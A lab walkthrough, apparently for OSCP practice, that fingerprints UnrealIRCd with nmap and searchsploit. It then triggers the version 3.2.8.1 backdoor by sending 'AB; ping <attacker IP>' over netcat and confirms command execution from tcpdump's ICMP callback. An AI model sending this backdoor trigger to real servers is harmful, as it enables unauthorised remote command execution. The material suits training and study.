┌──(kali㉿VirtualBox)-[~]
└─$ nmap -sC -sV 192.168.81.120 -p 6667,6697,8067
PORT STATE SERVICE VERSION
6667/tcp open irc UnrealIRCd
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
Service Info: Host: irc.foonet.com
Found that irc.foonet.com adding it to /etc/hosts
After going one by one on port 6667 and 6697, ending up only the port 8067 can be accessed via the website, and we getting the following error message:
:irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
:irc.foonet.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
:irc.foonet.com 451 GET :You have not registered
:irc.foonet.com 451 Host: :You have not registered
:irc.foonet.com 451 User-Agent: :You have not registered
:irc.foonet.com 451 Accept: :You have not registered
:irc.foonet.com 451 Accept-Language: :You have not registered
:irc.foonet.com 451 Accept-Encoding: :You have not registered
:irc.foonet.com 451 Connection: :You have not registered
:irc.foonet.com 451 Upgrade-Insecure-Requests: :You have not registered
ERROR :Closing Link: [192.168.49.81] (Ping timeout)
┌──(kali㉿VirtualBox)-[~]
└─$ searchsploit unrealirc
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Executi | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stac | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execut | linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service | windows/dos/27407.pl
---------------------------------------------- ---------------------------------
Shellcodes: No Results
Not much to do as these require Metasploit module, but for OSCP sake we ain’t use Metasploit.
There is one PoC about UnrealIRC since 2010 https://lwn.net/Articles/392201/
The payload as per follow:
AB; ping <attacker IP>
So first we setup a tcpdump listener that will show us if we get a ping back to our box
┌──(kali㉿VirtualBox)-[~]
└─$ sudo tcpdump -i tun0 icmp
Then we will run a netcat that connect to the IRC port:
┌──(kali㉿VirtualBox)-[~]
└─$ nc 192.168.81.120 6667 -vvv
While netcat is running, don’t let it go, paste the payload into it directly
┌──(kali㉿VirtualBox)-[~]
└─$ nc 192.168.81.120 6667 -vvv
192.168.81.120: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.81.120] 6667 (ircd) open
:irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
**AB; ping 192.168.49.81**
:irc.foonet.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
The end result will be our tcpdump getting some callback
┌──(kali㉿VirtualBox)-[~]
└─$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
10:27:22.971392 IP irc.foonet.com > 192.168.49.81: ICMP echo request, id 980, seq 314, length 64
10:27:22.971403 IP 192.168.49.81 > irc.foonet.com: ICMP echo reply, id 980, seq 314, length 64
10:27:23.995448 IP irc.foonet.com > 192.168.49.81: ICMP echo request, id 980, seq 315, length 64
10:27:23.995463 IP 192.168.49.81 > irc.foonet.com: ICMP echo reply, id 980, seq 315, length 64
10:27:25.019573 IP irc.foonet.com > 192.168.49.81: ICMP echo request, id 980, seq 316, length 64
10:27:25.019586 IP 192.168.49.81 > irc.foonet.com: ICMP echo reply, id 980, seq 316, length 64